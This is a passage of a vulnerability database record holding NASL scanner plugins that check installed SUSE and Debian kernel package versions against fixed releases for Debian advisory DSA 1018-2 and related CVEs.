release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-docs-2.6.8-24.19\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"Intel-536ep-4.69-10.4\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-bigsmp-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-bigsmp-nongpl-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-default-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-default-nongpl-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-smp-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-smp-nongpl-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-source-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-syms-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-um-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-um-nongpl-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-xen-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-xen-nongpl-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"ltmodem-8.31a10-7.4\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"um-host-install-initrd-1.0-50.4\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"um-host-kernel-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"kernel-docs-2.6.11.4-21.10\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\n", "cvss": {"score": 6.6, "vector": "AV:L/AC:L/Au:N/C:N/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:49:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-1058", "CVE-2005-3783", "CVE-2005-2457", "CVE-2005-3858", "CVE-2004-0887", "CVE-2005-4618", "CVE-2005-3806", "CVE-2005-3257", "CVE-2005-3848", "CVE-2005-1761", "CVE-2005-2709", "CVE-2005-2973", "CVE-2004-2607", "CVE-2005-0449", "CVE-2005-3857", "CVE-2005-2555"], "description": "The remote host is missing an update to kernel-source-2.4.27\nannounced via advisory DSA 1018-2. For details on the issues\naddressed with this update, please visit the referenced\nadvisories.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56533", "href": "http://plugins.openvas.org/nasl.php?oid=56533", "type": "openvas", "title": "Debian Security Advisory DSA 1018-2 (kernel-source-2.4.27)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1018_2.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1018-2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following matrix explains which kernel version for which architecture\nfix the problems referenced in this update:\n\nDebian 3.1 (sarge)\nSource 2.4.27-10sarge2\nAlpha architecture 2.4.27-10sarge2\nARM architecture 2.4.27-2sarge2\nIntel IA-32 architecture 2.4.27-10sarge2\nIntel IA-64 architecture 2.4.27-10sarge2\nMotorola 680x0 architecture 2.4.27-3sarge2\nBig endian MIPS architecture 2.4.27-10.sarge1.040815-2\nLittle endian MIPS architecture 2.4.27-10.sarge1.040815-2\nPowerPC architecture 2.4.27-10sarge2\nIBM S/390 architecture 2.4.27-2sarge2\nSun Sparc architecture 2.4.27-9sarge2\n\nThe following matrix lists additional packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\nDebian 3.1 (sarge)\nkernel-latest-2.4-alpha 101sarge1\nkernel-latest-2.4-i386 101sarge1\nkernel-latest-2.4-s390 2.4.27-1sarge1\nkernel-latest-2.4-sparc 42sarge2\nkernel-latest-powerpc 102sarge1\nfai-kernels 1.9.1sarge1\ni2c 1:2.9.1-1sarge1\nkernel-image-speakup-i386 2.4.27-1.1sasrge1\nlm-sensors 1:2.9.1-1sarge3\nmindi-kernel 2.4.27-2sarge1\npcmcia-modules-2.4.27-i386 3.2.5+2sarge1\nsystemimager 3.2.3-6sarge1\nalsa-modules-i386 1.0.8+2sarge1\n\nWe recommend that you upgrade your kernel package immediately and reboot\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.4.27\nannounced via advisory DSA 1018-2. For details on the issues\naddressed with this update, please visit the referenced\nadvisories.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201018-2\";\n\nif(description)\n{\n script_id(56533);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-0887\", \"CVE-2004-1058\", \"CVE-2004-2607\", \"CVE-2005-0449\", \"CVE-2005-1761\", \"CVE-2005-2457\", \"CVE-2005-2555\", \"CVE-2005-2709\", \"CVE-2005-2973\", \"CVE-2005-3257\", \"CVE-2005-3783\", \"CVE-2005-3806\", \"CVE-2005-3848\", \"CVE-2005-3857\", \"CVE-2005-3858\", \"CVE-2005-4618\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Debian Security Advisory DSA 1018-2 (kernel-source-2.4.27)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-patch-debian-2.4.27\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-source\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.4.27-speakup\", ver:\"2.4.27-1.1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-boot-ia64-standard\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-boot-i386-standard\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-source\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.4.27\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-tree-2.4.27\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-common\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-doc\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4-i2c\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-server\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.4.27\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-client\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemimager-server-flamethrowerd\", ver:\"3.2.3-6sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4-lm-sensors\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-generic\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-generic\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-generic\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-generic\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27-3\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-riscpc\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-riscstation\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-netwinder\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-lart\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-bast\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-speakup\", ver:\"2.4.27-1.1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-686\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-686-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-k6\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-k6\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-586tsc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-k7\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-386\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-k7-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-386\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-586tsc\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-386\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-686-smp\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-586tsc\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-686-smp\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-386\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-586tsc\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-k7\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-386\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-686\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-386\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-686\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-586tsc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mindi-kernel\", ver:\"2.4.27-2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-386\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-386\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-k7-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-k7-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-586tsc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-k7-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-k7\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-686\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-k6\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-586tsc\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-k7-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-686\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-586tsc\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-k6\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-686\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-386\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-686\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-686-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-k7-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-686-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsensors-dev\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-k6\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-k7-smp\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-k6\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4-k7\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-586tsc\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-686-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-686\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"sensord\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-k6\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.27-3-686-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-speakup\", ver:\"2.4.27-1.1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-686-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-k7\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-k6\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-k6\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-686\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-686-smp\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lm-sensors-2.4.27-3-k7-smp\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"i2c-2.4.27-3-k7\", ver:\"2.9.1-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-k7\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-k7\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.27-3-k7-smp\", ver:\"3.2.5+2sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-k7\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsensors3\", ver:\"2.9.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-mckinley-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-itanium-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-mckinley\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-itanium-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-mckinley-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-itanium\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-itanium\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-mckinley-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-itanium-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-mckinley\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-mckinley\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-itanium\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-mvme147\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-amiga\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-mvme16x\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-bvme6000\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-q40\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-atari\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-mac\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-r5k-ip22\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-r4k-ip22\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-sb1-swarm-bn\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mips-tools\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-r5k-lasat\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-r5k-cobalt\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-xxs1500\", 